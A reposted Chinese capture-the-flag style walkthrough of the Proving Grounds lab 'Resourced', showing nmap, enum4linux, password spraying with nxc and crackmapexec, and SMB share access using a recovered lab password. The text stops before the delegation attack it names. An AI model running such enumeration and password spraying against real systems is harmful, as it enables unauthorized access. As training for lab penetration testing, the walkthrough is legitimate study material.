OSCP靶场51--Resourced(PG靶场)
文章详细描述了一种基于资源的约束委派攻击过程,包括信息收集、密码爆破、提权至Administrator账户等步骤,并展示了使用nmap、enum4linux、crackmapexec等工具进行攻击的具体操作。 2025-9-28 03:24:53 Author: www.freebuf.com(查看原文) 阅读量:4 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

攻击链

信息收集---枚举用户信息,获得密码---收集SMB文件---从密码中提取hash值,密码爆破,获得新账户权限---收集域信息---进行基于资源的约束委派攻击,提权至Administrator账户

知识点

基于资源的约束委派攻击

过程

端口服务扫描

ports=$(nmap -p- --min-rate=1000  -T4 192.168.109.175 | grep ^[0-9] | cut -d

'/' -f 1 | tr '\n' ',' | sed s/,$//) && nmap -A  -p$ports 192.168.109.175  > n1.txt

1758962179_68d7a203ace78b2caa142.png!small?1758962180789

所以这里我的做法是挨个做信息收集,如果开了80端口,那一定是优先看。因为一般不会白开。

全面枚举,简单高效。

enum4linux -a resourced.local

1758965613_68d7af6d788b8bbb50106.png!small?1758965614112

疑似密码的字符串,新雇佣的,注意密码!那就是这个用户名和密码对应。这个时候,有smb445,winrm5985均可尝试。执行密码喷洒,其实就应该是这个用户的密码,但也许其他用户可能会用相同的密码?

生成用户名字典:

1758966836_68d7b43424af97f0c9d9b.png!small?1758966837887

nxc smb resourced.local -u users.txt -p 'HotelCalifornia194!' --continue-on-success

1758967540_68d7b6f425cc12c1b9873.png!small?1758967540654

这个出货了。winrm试一下,

nxc winrm  resourced.local -u users.txt -p 'HotelCalifornia194!' --continue-on-success

1758968346_68d7ba1a4e989417e9ac1.png!small?1758968347190

winrm没有,那V.Ventz不在RM组里。连接SMB收集信息。先看有哪些文件夹及对应的权限。

crackmapexec smb  192.168.159.175   -u 'V.Ventz'  -p 'HotelCalifornia194!'  --shares

1758978308_68d7e1043849d106b64ff.png!small?1758978308851

建立交互式连接

smbclient    \\\\192.168.159.175\\Password\ Audit -U 'V.Ventz%HotelCalifornia194!'

1758

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/system/450719.html
如有侵权请联系:admin#unsafe.sh